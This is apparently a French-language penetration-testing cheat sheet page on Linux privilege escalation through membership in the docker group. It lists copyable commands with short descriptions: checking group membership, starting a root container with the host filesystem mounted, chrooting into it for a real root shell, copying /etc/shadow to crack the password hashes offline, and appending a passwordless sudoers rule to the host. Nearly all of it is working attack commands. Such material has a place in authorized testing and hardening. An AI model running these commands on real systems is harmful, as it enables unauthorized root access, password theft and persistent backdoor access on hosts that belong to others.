Privesc Linux

Docker Privesc

Utilisateur dans le groupe docker : monter / dans un container root, chroot, game over.

Enumération

Copy command

id

Description: Vérifier si docker est dans les groupes actifs de la session.

Copy command

groups

Description: Liste des groupes de l'utilisateur, chercher docker dedans.

Copy command

newgrp docker

Description: Activer le groupe docker dans la session courante sans se reconnecter.

Copy command

docker ps

Description: Vérifier que docker est fonctionnel et lister les containers en cours.

Copy command

docker images

Description: Lister les images disponibles localement pour réutiliser une existante.

Copy command

docker run --rm -it -u 0 --entrypoint sh -v /:/mnt $IMAGE

Description: Lancer un container en root (-u 0) avec le FS host monté sous /mnt. Remplacer $IMAGE par une image déjà présente sur la machine.

Copy command

chroot /mnt sh

Description: Depuis l'intérieur du container, chroot vers le FS host pour obtenir un shell root réel.

Copy command

cp /mnt/etc/shadow /tmp/shadow && cat /tmp/shadow

Description: Exfiltrer /etc/shadow via le montage pour cracker les hashes offline.

Copy command

echo '$USER ALL=(ALL) NOPASSWD:ALL' >> /mnt/etc/sudoers

Description: Injecter une règle sudoers pour obtenir sudo sans mot de passe sur l'hôte.